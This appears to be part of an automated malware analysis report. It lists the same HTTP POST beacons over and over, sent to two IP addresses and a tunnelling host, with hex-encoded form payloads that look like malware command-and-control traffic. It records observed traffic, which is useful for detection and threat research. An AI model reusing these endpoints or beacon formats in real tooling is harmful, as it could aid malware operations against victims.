Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
